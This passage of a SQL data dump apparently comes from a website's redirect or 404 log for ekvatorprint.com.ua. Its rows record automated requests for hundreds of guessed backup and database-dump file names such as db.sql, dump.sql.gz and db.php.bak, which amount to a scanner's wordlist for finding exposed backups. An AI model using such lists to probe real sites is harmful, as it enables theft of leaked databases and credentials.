00:00:00',301),(10885,'http://ekvatorprint.com.ua/ekvatorprint_dump.tar',NULL,'','',1,0,'2017-08-16 17:19:34','0000-00-00 00:00:00',301),(10886,'http://ekvatorprint.com.ua/ekvatorprint-dump.tar',NULL,'','',1,0,'2017-08-16 17:19:35','0000-00-00 00:00:00',301),(10887,'http://ekvatorprint.com.ua/ekvatorprintbackup.tar',NULL,'','',1,0,'2017-08-16 17:19:35','0000-00-00 00:00:00',301),(10888,'http://ekvatorprint.com.ua/ekvatorprint_backup.tar',NULL,'','',2,0,'2017-08-16 17:19:35','0000-00-00 00:00:00',301),(10889,'http://ekvatorprint.com.ua/ekvatorprint-backup.tar',NULL,'','',1,0,'2017-08-16 17:19:35','0000-00-00 00:00:00',301),(10890,'http://ekvatorprint.com.ua/backupekvatorprint.tar',NULL,'','',1,0,'2017-08-16 17:19:35','0000-00-00 00:00:00',301),(10891,'http://ekvatorprint.com.ua/backup-ekvatorprint.tar',NULL,'','',1,0,'2017-08-16 17:19:35','0000-00-00 00:00:00',301),(10892,'http://ekvatorprint.com.ua/backup_ekvatorprint.tar',NULL,'','',1,0,'2017-08-16 17:19:36','0000-00-00 00:00:00',301),(10893,'http://ekvatorprint.com.ua/db.7z',NULL,'','',1,0,'2017-08-16 17:19:36','0000-00-00 00:00:00',301),(10894,'http://ekvatorprint.com.ua/dbdump.7z',NULL,'','',1,0,'2017-08-16 17:19:36','0000-00-00 00:00:00',301),(10895,'http://ekvatorprint.com.ua/database.7z',NULL,'','',1,0,'2017-08-16 17:19:37','0000-00-00 00:00:00',301),(10896,'http://ekvatorprint.com.ua/localhost.7z',NULL,'','',2,0,'2017-08-16 17:19:37','0000-00-00 00:00:00',301),(10897,'http://ekvatorprint.com.ua/localhostdb.7z',NULL,'','',1,0,'2017-08-16 17:19:38','0000-00-00 00:00:00',301),(10898,'http://ekvatorprint.com.ua/localhost_db.7z',NULL,'','',1,0,'2017-08-16 17:19:38','0000-00-00 00:00:00',301),(10899,'http://ekvatorprint.com.ua/localhost-db.7z',NULL,'','',1,0,'2017-08-16 17:19:38','0000-00-00 00:00:00',301),(10900,'http://ekvatorprint.com.ua/localhost_database.7z',NULL,'','',1,0,'2017-08-16 17:19:38','0000-00-00 00:00:00',301),(10901,'http://ekvatorprint.com.ua/localhost-database.7z',NULL,'','',1,0,'2017-08-16 17:19:39','0000-00-00 00:00:00',301),(10902,'http://ekvatorprint.com.ua/localhost_dump.7z',NULL,'','',1,0,'2017-08-16 17:19:39','0000-00-00 00:00:00',301),(10903,'http://ekvatorprint.com.ua/localhost-dump.7z',NULL,'','',1,0,'2017-08-16 17:19:39','0000-00-00 00:00:00',301),(10904,'http://ekvatorprint.com.ua/localhostbackup.7z',NULL,'','',1,0,'2017-08-16 17:19:39','0000-00-00 00:00:00',301),(10905,'http://ekvatorprint.com.ua/localhost_backup.7z',NULL,'','',1,0,'2017-08-16 17:19:39','0000-00-00 00:00:00',301),(10906,'http://ekvatorprint.com.ua/localhost-backup.7z',NULL,'','',1,0,'2017-08-16 17:19:39','0000-00-00 00:00:00',301),(10907,'http://ekvatorprint.com.ua/backuplocalhost.7z',NULL,'','',1,0,'2017-08-16 17:19:40','0000-00-00 00:00:00',301),(10908,'http://ekvatorprint.com.ua/backup-localhost.7z',NULL,'','',1,0,'2017-08-16 17:19:40','0000-00-00 00:00:00',301),(10909,'http://ekvatorprint.com.ua/backup_localhost.7z',NULL,'','',1,0,'2017-08-16 17:19:41','0000-00-00 00:00:00',301),(10910,'http://ekvatorprint.com.ua/ekvatorprint.7z',NULL,'','',2,0,'2017-08-16 17:19:41','0000-00-00 00:00:00',301),(10911,'http://ekvatorprint.com.ua/ekvatorprintdb.7z',NULL,'','',1,0,'2017-08-16 17:19:41','0000-00-00 00:00:00',301),(10912,'http://ekvatorprint.com.ua/ekvatorprint_db.7z',NULL,'','',1,0,'2017-08-16 17:19:41','0000-00-00 00:00:00',301),(10913,'http://ekvatorprint.com.ua/ekvatorprint-db.7z',NULL,'','',1,0,'2017-08-16 17:19:42','0000-00-00 00:00:00',301),(10914,'http://ekvatorprint.com.ua/ekvatorprint_database.7z',NULL,'','',1,0,'2017-08-16 17:19:42','0000-00-00 00:00:00',301),(10915,'http://ekvatorprint.com.ua/ekvatorprint-database.7z',NULL,'','',1,0,'2017-08-16 17:19:42','0000-00-00 00:00:00',301),(10916,'http://ekvatorprint.com.ua/ekvatorprint_dump.7z',NULL,'','',1,0,'2017-08-16 17:19:43','0000-00-00 00:00:00',301),(10917,'http://ekvatorprint.com.ua/ekvatorprint-dump.7z',NULL,'','',1,0,'2017-08-16 17:19:43','0000-00-00 00:00:00',301),(10918,'http://ekvatorprint.com.ua/ekvatorprintbackup.7z',NULL,'','',1,0,'2017-08-16 17:19:43','0000-00-00 00:00:00',301),(10919,'http://ekvatorprint.com.ua/ekvatorprint_backup.7z',NULL,'','',2,0,'2017-08-16 17:19:43','0000-00-00 00:00:00',301),(10920,'http://ekvatorprint.com.ua/ekvatorprint-backup.7z',NULL,'','',1,0,'2017-08-16 17:19:44','0000-00-00 00:00:00',301),(10921,'http://ekvatorprint.com.ua/backupekvatorprint.7z',NULL,'','',1,0,'2017-08-16 17:19:44','0000-00-00 00:00:00',301),(10922,'http://ekvatorprint.com.ua/backup-ekvatorprint.7z',NULL,'','',1,0,'2017-08-16 17:19:44','0000-00-00 00:00:00',301),(10923,'http://ekvatorprint.com.ua/backup_ekvatorprint.7z',NULL,'','',1,0,'2017-08-16 17:19:44','0000-00-00 00:00:00',301),(10924,'http://ekvatorprint.com.ua/ekvatorprint.com.uadb.7z',NULL,'','',1,0,'2017-08-16 17:19:44','0000-00-00 00:00:00',301),(10925,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_db.7z',NULL,'','',1,0,'2017-08-16 17:19:45','0000-00-00 00:00:00',301),(10926,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-db.7z',NULL,'','',1,0,'2017-08-16 17:19:45','0000-00-00 00:00:00',301),(10927,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_database.7z',NULL,'','',1,0,'2017-08-16 17:19:45','0000-00-00 00:00:00',301),(10928,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-database.7z',NULL,'','',1,0,'2017-08-16 17:19:46','0000-00-00 00:00:00',301),(10929,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.7z',NULL,'','',1,0,'2017-08-16 17:19:47','0000-00-00 00:00:00',301),(10930,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.7z',NULL,'','',1,0,'2017-08-16 17:19:48','0000-00-00 00:00:00',301),(10931,'http://ekvatorprint.com.ua/ekvatorprint.com.uabackup.7z',NULL,'','',1,0,'2017-08-16 17:19:48','0000-00-00 00:00:00',301),(10932,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.7z',NULL,'','',1,0,'2017-08-16 17:19:48','0000-00-00 00:00:00',301),(10933,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.7z',NULL,'','',1,0,'2017-08-16 17:19:49','0000-00-00 00:00:00',301),(10934,'http://ekvatorprint.com.ua/backupekvatorprint.com.ua.7z',NULL,'','',1,0,'2017-08-16 17:19:49','0000-00-00 00:00:00',301),(10935,'http://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.7z',NULL,'','',1,0,'2017-08-16 17:19:49','0000-00-00 00:00:00',301),(10936,'http://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.7z',NULL,'','',1,0,'2017-08-16 17:19:50','0000-00-00 00:00:00',301),(10937,'http://ekvatorprint.com.ua/dbdump.rar',NULL,'','',1,0,'2017-08-16 17:19:50','0000-00-00 00:00:00',301),(10938,'http://ekvatorprint.com.ua/database.rar',NULL,'','',2,0,'2017-08-16 17:19:52','0000-00-00 00:00:00',301),(10939,'http://ekvatorprint.com.ua/localhost.rar',NULL,'','',1,0,'2017-08-16 17:19:52','0000-00-00 00:00:00',301),(10940,'http://ekvatorprint.com.ua/localhostdb.rar',NULL,'','',1,0,'2017-08-16 17:19:53','0000-00-00 00:00:00',301),(10941,'http://ekvatorprint.com.ua/localhost_db.rar',NULL,'','',1,0,'2017-08-16 17:19:53','0000-00-00 00:00:00',301),(10942,'http://ekvatorprint.com.ua/localhost-db.rar',NULL,'','',1,0,'2017-08-16 17:19:54','0000-00-00 00:00:00',301),(10943,'http://ekvatorprint.com.ua/localhost_database.rar',NULL,'','',1,0,'2017-08-16 17:19:54','0000-00-00 00:00:00',301),(10944,'http://ekvatorprint.com.ua/localhost-database.rar',NULL,'','',1,0,'2017-08-16 17:19:55','0000-00-00 00:00:00',301),(10945,'http://ekvatorprint.com.ua/localhost_dump.rar',NULL,'','',1,0,'2017-08-16 17:19:55','0000-00-00 00:00:00',301),(10946,'http://ekvatorprint.com.ua/localhost-dump.rar',NULL,'','',1,0,'2017-08-16 17:19:55','0000-00-00 00:00:00',301),(10947,'http://ekvatorprint.com.ua/localhostbackup.rar',NULL,'','',1,0,'2017-08-16 17:19:56','0000-00-00 00:00:00',301),(10948,'http://ekvatorprint.com.ua/localhost_backup.rar',NULL,'','',1,0,'2017-08-16 17:19:58','0000-00-00 00:00:00',301),(10949,'http://ekvatorprint.com.ua/localhost-backup.rar',NULL,'','',1,0,'2017-08-16 17:19:58','0000-00-00 00:00:00',301),(10950,'http://ekvatorprint.com.ua/backuplocalhost.rar',NULL,'','',1,0,'2017-08-16 17:19:58','0000-00-00 00:00:00',301),(10951,'http://ekvatorprint.com.ua/backup-localhost.rar',NULL,'','',1,0,'2017-08-16 17:19:58','0000-00-00 00:00:00',301),(10952,'http://ekvatorprint.com.ua/backup_localhost.rar',NULL,'','',1,0,'2017-08-16 17:19:58','0000-00-00 00:00:00',301),(10953,'http://ekvatorprint.com.ua/ekvatorprint.com.uadb.rar',NULL,'','',1,0,'2017-08-16 17:19:59','0000-00-00 00:00:00',301),(10954,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_db.rar',NULL,'','',1,0,'2017-08-16 17:19:59','0000-00-00 00:00:00',301),(10955,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-db.rar',NULL,'','',1,0,'2017-08-16 17:19:59','0000-00-00 00:00:00',301),(10956,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_database.rar',NULL,'','',1,0,'2017-08-16 17:20:00','0000-00-00 00:00:00',301),(10957,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-database.rar',NULL,'','',1,0,'2017-08-16 17:20:00','0000-00-00 00:00:00',301),(10958,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.rar',NULL,'','',1,0,'2017-08-16 17:20:00','0000-00-00 00:00:00',301),(10959,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.rar',NULL,'','',1,0,'2017-08-16 17:20:00','0000-00-00 00:00:00',301),(10960,'http://ekvatorprint.com.ua/ekvatorprint.com.uabackup.rar',NULL,'','',1,0,'2017-08-16 17:20:00','0000-00-00 00:00:00',301),(10961,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.rar',NULL,'','',1,0,'2017-08-16 17:20:01','0000-00-00 00:00:00',301),(10962,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.rar',NULL,'','',1,0,'2017-08-16 17:20:01','0000-00-00 00:00:00',301),(10963,'http://ekvatorprint.com.ua/backupekvatorprint.com.ua.rar',NULL,'','',1,0,'2017-08-16 17:20:01','0000-00-00 00:00:00',301),(10964,'http://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.rar',NULL,'','',1,0,'2017-08-16 17:20:02','0000-00-00 00:00:00',301),(10965,'http://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.rar',NULL,'','',1,0,'2017-08-16 17:20:02','0000-00-00 00:00:00',301),(10966,'http://ekvatorprint.com.ua/ekvatorprintdb.rar',NULL,'','',1,0,'2017-08-16 17:20:02','0000-00-00 00:00:00',301),(10967,'http://ekvatorprint.com.ua/ekvatorprint_db.rar',NULL,'','',1,0,'2017-08-16 17:20:02','0000-00-00 00:00:00',301),(10968,'http://ekvatorprint.com.ua/ekvatorprint-db.rar',NULL,'','',1,0,'2017-08-16 17:20:02','0000-00-00 00:00:00',301),(10969,'http://ekvatorprint.com.ua/ekvatorprint_database.rar',NULL,'','',1,0,'2017-08-16 17:20:03','0000-00-00 00:00:00',301),(10970,'http://ekvatorprint.com.ua/ekvatorprint-database.rar',NULL,'','',1,0,'2017-08-16 17:20:03','0000-00-00 00:00:00',301),(10971,'http://ekvatorprint.com.ua/ekvatorprint_dump.rar',NULL,'','',1,0,'2017-08-16 17:20:03','0000-00-00 00:00:00',301),(10972,'http://ekvatorprint.com.ua/ekvatorprint-dump.rar',NULL,'','',1,0,'2017-08-16 17:20:04','0000-00-00 00:00:00',301),(10973,'http://ekvatorprint.com.ua/ekvatorprintbackup.rar',NULL,'','',1,0,'2017-08-16 17:20:05','0000-00-00 00:00:00',301),(10974,'http://ekvatorprint.com.ua/ekvatorprint-backup.rar',NULL,'','',1,0,'2017-08-16 17:20:05','0000-00-00 00:00:00',301),(10975,'http://ekvatorprint.com.ua/backupekvatorprint.rar',NULL,'','',1,0,'2017-08-16 17:20:05','0000-00-00 00:00:00',301),(10976,'http://ekvatorprint.com.ua/backup-ekvatorprint.rar',NULL,'','',1,0,'2017-08-16 17:20:05','0000-00-00 00:00:00',301),(10977,'http://ekvatorprint.com.ua/backup_ekvatorprint.rar',NULL,'','',1,0,'2017-08-16 17:20:05','0000-00-00 00:00:00',301),(10978,'http://ekvatorprint.com.ua/db/db_backup.ekvatorprint.com.ua.sql.gz',NULL,'','',3,0,'2017-08-16 17:20:06','0000-00-00 00:00:00',301),(10979,'http://ekvatorprint.com.ua/db/db_backup.ekvatorprint.sql.gz',NULL,'','',3,0,'2017-08-16 17:20:06','0000-00-00 00:00:00',301),(10980,'http://ekvatorprint.com.ua/db/db_backup.sql.gz',NULL,'','',3,0,'2017-08-16 17:20:06','0000-00-00 00:00:00',301),(10981,'http://ekvatorprint.com.ua/db/db_backup.ekvatorprint.com.ua.sql',NULL,'','',3,0,'2017-08-16 17:20:06','0000-00-00 00:00:00',301),(10982,'http://ekvatorprint.com.ua/db/db_backup.ekvatorprint.sql',NULL,'','',3,0,'2017-08-16 17:20:06','0000-00-00 00:00:00',301),(10983,'http://ekvatorprint.com.ua/db/Dump.sql',NULL,'','',3,0,'2017-08-16 17:20:06','0000-00-00 00:00:00',301),(10984,'http://ekvatorprint.com.ua/db/backup.sql',NULL,'','',3,0,'2017-08-16 17:20:07','0000-00-00 00:00:00',301),(10985,'http://ekvatorprint.com.ua/db/backup.sql.zip',NULL,'','',3,0,'2017-08-16 17:20:07','0000-00-00 00:00:00',301),(10986,'http://ekvatorprint.com.ua/db/_db_.sql',NULL,'','',1,0,'2017-08-16 17:20:07','0000-00-00 00:00:00',301),(10987,'http://ekvatorprint.com.ua/db/_DB_.sql',NULL,'','',1,0,'2017-08-16 17:20:07','0000-00-00 00:00:00',301),(10988,'http://ekvatorprint.com.ua/db/_DB_.sql.zip',NULL,'','',1,0,'2017-08-16 17:20:07','0000-00-00 00:00:00',301),(10989,'http://ekvatorprint.com.ua/db/_DB_.tar.gz',NULL,'','',1,0,'2017-08-16 17:20:07','0000-00-00 00:00:00',301),(10990,'http://ekvatorprint.com.ua/db/sql.txt',NULL,'','',1,0,'2017-08-16 17:20:08','0000-00-00 00:00:00',301),(10991,'http://ekvatorprint.com.ua/db/database.sql',NULL,'','',1,0,'2017-08-16 17:20:08','0000-00-00 00:00:00',301),(10992,'http://ekvatorprint.com.ua/db/sql.sql',NULL,'','',1,0,'2017-08-16 17:20:08','0000-00-00 00:00:00',301),(10993,'http://ekvatorprint.com.ua/db/bak.sql',NULL,'','',1,0,'2017-08-16 17:20:08','0000-00-00 00:00:00',301),(10994,'http://ekvatorprint.com.ua/db/bck.sql',NULL,'','',1,0,'2017-08-16 17:20:08','0000-00-00 00:00:00',301),(10995,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua.bak.sql',NULL,'','',1,0,'2017-08-16 17:20:09','0000-00-00 00:00:00',301),(10996,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua.bck.sql',NULL,'','',1,0,'2017-08-16 17:20:09','0000-00-00 00:00:00',301),(10997,'http://ekvatorprint.com.ua/db/ekvatorprint.bak.sql',NULL,'','',1,0,'2017-08-16 17:20:09','0000-00-00 00:00:00',301),(10998,'http://ekvatorprint.com.ua/db/ekvatorprint.bck.sql',NULL,'','',1,0,'2017-08-16 17:20:09','0000-00-00 00:00:00',301),(10999,'http://ekvatorprint.com.ua/db/data.sql',NULL,'','',1,0,'2017-08-16 17:20:09','0000-00-00 00:00:00',301),(11000,'http://ekvatorprint.com.ua/db/dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:10','0000-00-00 00:00:00',301),(11001,'http://ekvatorprint.com.ua/db/dump.sql.tgz',NULL,'','',1,0,'2017-08-16 17:20:10','0000-00-00 00:00:00',301),(11002,'http://ekvatorprint.com.ua/db/dump.sql.bck',NULL,'','',1,0,'2017-08-16 17:20:10','0000-00-00 00:00:00',301),(11003,'http://ekvatorprint.com.ua/db/www.ekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:20:11','0000-00-00 00:00:00',301),(11004,'http://ekvatorprint.com.ua/db/www.ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:11','0000-00-00 00:00:00',301),(11005,'http://ekvatorprint.com.ua/db/www.ekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:20:11','0000-00-00 00:00:00',301),(11006,'http://ekvatorprint.com.ua/db/www.ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:12','0000-00-00 00:00:00',301),(11007,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua.sql',NULL,'','',3,0,'2017-08-16 17:20:12','0000-00-00 00:00:00',301),(11008,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:12','0000-00-00 00:00:00',301),(11009,'http://ekvatorprint.com.ua/db/ekvatorprint.sql',NULL,'','',3,0,'2017-08-16 17:20:12','0000-00-00 00:00:00',301),(11010,'http://ekvatorprint.com.ua/db/ekvatorprint_backup.sql',NULL,'','',1,0,'2017-08-16 17:20:12','0000-00-00 00:00:00',301),(11011,'http://ekvatorprint.com.ua/db/ekvatorprint_backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:13','0000-00-00 00:00:00',301),(11012,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_MySQL.sql',NULL,'','',1,0,'2017-08-16 17:20:13','0000-00-00 00:00:00',301),(11013,'http://ekvatorprint.com.ua/db/ekvatorprint_MySQL.sql',NULL,'','',1,0,'2017-08-16 17:20:13','0000-00-00 00:00:00',301),(11014,'http://ekvatorprint.com.ua/db/databases.sql',NULL,'','',1,0,'2017-08-16 17:20:13','0000-00-00 00:00:00',301),(11015,'http://ekvatorprint.com.ua/db/databases.zip',NULL,'','',1,0,'2017-08-16 17:20:15','0000-00-00 00:00:00',301),(11016,'http://ekvatorprint.com.ua/db/databases.tar',NULL,'','',1,0,'2017-08-16 17:20:15','0000-00-00 00:00:00',301),(11017,'http://ekvatorprint.com.ua/db/databases.tar.gz',NULL,'','',1,0,'2017-08-16 17:20:15','0000-00-00 00:00:00',301),(11018,'http://ekvatorprint.com.ua/db/databases.tgz',NULL,'','',1,0,'2017-08-16 17:20:15','0000-00-00 00:00:00',301),(11019,'http://ekvatorprint.com.ua/db/databases.bck',NULL,'','',1,0,'2017-08-16 17:20:15','0000-00-00 00:00:00',301),(11020,'http://ekvatorprint.com.ua/db/db.php~',NULL,'','',1,0,'2017-08-16 17:20:15','0000-00-00 00:00:00',301),(11021,'http://ekvatorprint.com.ua/db/db.bak',NULL,'','',1,0,'2017-08-16 17:20:16','0000-00-00 00:00:00',301),(11022,'http://ekvatorprint.com.ua/db/db.php.bck',NULL,'','',1,0,'2017-08-16 17:20:17','0000-00-00 00:00:00',301),(11023,'http://ekvatorprint.com.ua/db/db.php.bak',NULL,'','',1,0,'2017-08-16 17:20:17','0000-00-00 00:00:00',301),(11024,'http://ekvatorprint.com.ua/db/database.php~',NULL,'','',1,0,'2017-08-16 17:20:17','0000-00-00 00:00:00',301),(11025,'http://ekvatorprint.com.ua/db/database.bak',NULL,'','',1,0,'2017-08-16 17:20:17','0000-00-00 00:00:00',301),(11026,'http://ekvatorprint.com.ua/db/database.php.bak',NULL,'','',1,0,'2017-08-16 17:20:18','0000-00-00 00:00:00',301),(11027,'http://ekvatorprint.com.ua/db/database.php.bck',NULL,'','',1,0,'2017-08-16 17:20:18','0000-00-00 00:00:00',301),(11028,'http://ekvatorprint.com.ua/db/db.gz',NULL,'','',1,0,'2017-08-16 17:20:18','0000-00-00 00:00:00',301),(11029,'http://ekvatorprint.com.ua/db/db.rar',NULL,'','',1,0,'2017-08-16 17:20:18','0000-00-00 00:00:00',301),(11030,'http://ekvatorprint.com.ua/db/db.zip',NULL,'','',1,0,'2017-08-16 17:20:19','0000-00-00 00:00:00',301),(11031,'http://ekvatorprint.com.ua/db/db.bz2',NULL,'','',1,0,'2017-08-16 17:20:19','0000-00-00 00:00:00',301),(11032,'http://ekvatorprint.com.ua/db/db.tgz',NULL,'','',1,0,'2017-08-16 17:20:19','0000-00-00 00:00:00',301),(11033,'http://ekvatorprint.com.ua/db/db.bck',NULL,'','',1,0,'2017-08-16 17:20:20','0000-00-00 00:00:00',301),(11034,'http://ekvatorprint.com.ua/db/database.gz',NULL,'','',1,0,'2017-08-16 17:20:20','0000-00-00 00:00:00',301),(11035,'http://ekvatorprint.com.ua/db/database.bz2',NULL,'','',1,0,'2017-08-16 17:20:20','0000-00-00 00:00:00',301),(11036,'http://ekvatorprint.com.ua/db/database.tgz',NULL,'','',1,0,'2017-08-16 17:20:21','0000-00-00 00:00:00',301),(11037,'http://ekvatorprint.com.ua/db/database.bck',NULL,'','',1,0,'2017-08-16 17:20:22','0000-00-00 00:00:00',301),(11038,'http://ekvatorprint.com.ua/db/db.sql',NULL,'','',1,0,'2017-08-16 17:20:23','0000-00-00 00:00:00',301),(11039,'http://ekvatorprint.com.ua/db/dump.sql',NULL,'','',3,0,'2017-08-16 17:20:23','0000-00-00 00:00:00',301),(11040,'http://ekvatorprint.com.ua/db/dbdump.sql',NULL,'','',1,0,'2017-08-16 17:20:25','0000-00-00 00:00:00',301),(11041,'http://ekvatorprint.com.ua/db/localhost.sql',NULL,'','',1,0,'2017-08-16 17:20:25','0000-00-00 00:00:00',301),(11042,'http://ekvatorprint.com.ua/db/localhostdb.sql',NULL,'','',1,0,'2017-08-16 17:20:25','0000-00-00 00:00:00',301),(11043,'http://ekvatorprint.com.ua/db/localhost_db.sql',NULL,'','',1,0,'2017-08-16 17:20:25','0000-00-00 00:00:00',301),(11044,'http://ekvatorprint.com.ua/db/localhost-db.sql',NULL,'','',1,0,'2017-08-16 17:20:25','0000-00-00 00:00:00',301),(11045,'http://ekvatorprint.com.ua/db/localhost_database.sql',NULL,'','',1,0,'2017-08-16 17:20:25','0000-00-00 00:00:00',301),(11046,'http://ekvatorprint.com.ua/db/localhost-database.sql',NULL,'','',1,0,'2017-08-16 17:20:26','0000-00-00 00:00:00',301),(11047,'http://ekvatorprint.com.ua/db/localhost_dump.sql',NULL,'','',1,0,'2017-08-16 17:20:27','0000-00-00 00:00:00',301),(11048,'http://ekvatorprint.com.ua/db/localhost-dump.sql',NULL,'','',1,0,'2017-08-16 17:20:27','0000-00-00 00:00:00',301),(11049,'http://ekvatorprint.com.ua/db/localhostbackup.sql',NULL,'','',1,0,'2017-08-16 17:20:27','0000-00-00 00:00:00',301),(11050,'http://ekvatorprint.com.ua/db/localhost_backup.sql',NULL,'','',1,0,'2017-08-16 17:20:27','0000-00-00 00:00:00',301),(11051,'http://ekvatorprint.com.ua/db/localhost-backup.sql',NULL,'','',1,0,'2017-08-16 17:20:27','0000-00-00 00:00:00',301),(11052,'http://ekvatorprint.com.ua/db/backuplocalhost.sql',NULL,'','',1,0,'2017-08-16 17:20:27','0000-00-00 00:00:00',301),(11053,'http://ekvatorprint.com.ua/db/backup-localhost.sql',NULL,'','',1,0,'2017-08-16 17:20:28','0000-00-00 00:00:00',301),(11054,'http://ekvatorprint.com.ua/db/backup_localhost.sql',NULL,'','',1,0,'2017-08-16 17:20:28','0000-00-00 00:00:00',301),(11055,'http://ekvatorprint.com.ua/db/ekvatorprintdb.sql',NULL,'','',1,0,'2017-08-16 17:20:28','0000-00-00 00:00:00',301),(11056,'http://ekvatorprint.com.ua/db/ekvatorprint_db.sql',NULL,'','',1,0,'2017-08-16 17:20:29','0000-00-00 00:00:00',301),(11057,'http://ekvatorprint.com.ua/db/ekvatorprint-db.sql',NULL,'','',1,0,'2017-08-16 17:20:29','0000-00-00 00:00:00',301),(11058,'http://ekvatorprint.com.ua/db/ekvatorprint_database.sql',NULL,'','',1,0,'2017-08-16 17:20:29','0000-00-00 00:00:00',301),(11059,'http://ekvatorprint.com.ua/db/ekvatorprint-database.sql',NULL,'','',1,0,'2017-08-16 17:20:29','0000-00-00 00:00:00',301),(11060,'http://ekvatorprint.com.ua/db/ekvatorprint_dump.sql',NULL,'','',1,0,'2017-08-16 17:20:29','0000-00-00 00:00:00',301),(11061,'http://ekvatorprint.com.ua/db/ekvatorprint-dump.sql',NULL,'','',1,0,'2017-08-16 17:20:29','0000-00-00 00:00:00',301),(11062,'http://ekvatorprint.com.ua/db/ekvatorprintbackup.sql',NULL,'','',1,0,'2017-08-16 17:20:30','0000-00-00 00:00:00',301),(11063,'http://ekvatorprint.com.ua/db/ekvatorprint-backup.sql',NULL,'','',1,0,'2017-08-16 17:20:30','0000-00-00 00:00:00',301),(11064,'http://ekvatorprint.com.ua/db/backupekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:20:30','0000-00-00 00:00:00',301),(11065,'http://ekvatorprint.com.ua/db/backup-ekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:20:30','0000-00-00 00:00:00',301),(11066,'http://ekvatorprint.com.ua/db/backup_ekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:20:31','0000-00-00 00:00:00',301),(11067,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uadb.sql',NULL,'','',1,0,'2017-08-16 17:20:31','0000-00-00 00:00:00',301),(11068,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_db.sql',NULL,'','',1,0,'2017-08-16 17:20:31','0000-00-00 00:00:00',301),(11069,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-db.sql',NULL,'','',1,0,'2017-08-16 17:20:31','0000-00-00 00:00:00',301),(11070,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_database.sql',NULL,'','',1,0,'2017-08-16 17:20:32','0000-00-00 00:00:00',301),(11071,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-database.sql',NULL,'','',1,0,'2017-08-16 17:20:32','0000-00-00 00:00:00',301),(11072,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_dump.sql',NULL,'','',1,0,'2017-08-16 17:20:32','0000-00-00 00:00:00',301),(11073,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-dump.sql',NULL,'','',1,0,'2017-08-16 17:20:32','0000-00-00 00:00:00',301),(11074,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uabackup.sql',NULL,'','',1,0,'2017-08-16 17:20:33','0000-00-00 00:00:00',301),(11075,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_backup.sql',NULL,'','',1,0,'2017-08-16 17:20:33','0000-00-00 00:00:00',301),(11076,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-backup.sql',NULL,'','',1,0,'2017-08-16 17:20:33','0000-00-00 00:00:00',301),(11077,'http://ekvatorprint.com.ua/db/backupekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:20:33','0000-00-00 00:00:00',301),(11078,'http://ekvatorprint.com.ua/db/backup-ekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:20:34','0000-00-00 00:00:00',301),(11079,'http://ekvatorprint.com.ua/db/backup_ekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:20:34','0000-00-00 00:00:00',301),(11080,'http://ekvatorprint.com.ua/db/db.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:34','0000-00-00 00:00:00',301),(11081,'http://ekvatorprint.com.ua/db/dbdump.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:35','0000-00-00 00:00:00',301),(11082,'http://ekvatorprint.com.ua/db/database.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:35','0000-00-00 00:00:00',301),(11083,'http://ekvatorprint.com.ua/db/backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:35','0000-00-00 00:00:00',301),(11084,'http://ekvatorprint.com.ua/db/localhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:36','0000-00-00 00:00:00',301),(11085,'http://ekvatorprint.com.ua/db/localhostdb.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:36','0000-00-00 00:00:00',301),(11086,'http://ekvatorprint.com.ua/db/localhost_db.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:37','0000-00-00 00:00:00',301),(11087,'http://ekvatorprint.com.ua/db/localhost-db.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:37','0000-00-00 00:00:00',301),(11088,'http://ekvatorprint.com.ua/db/localhost_database.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:37','0000-00-00 00:00:00',301),(11089,'http://ekvatorprint.com.ua/db/localhost-database.sql.gz',NULL,'','',1,0,'2017-08-16 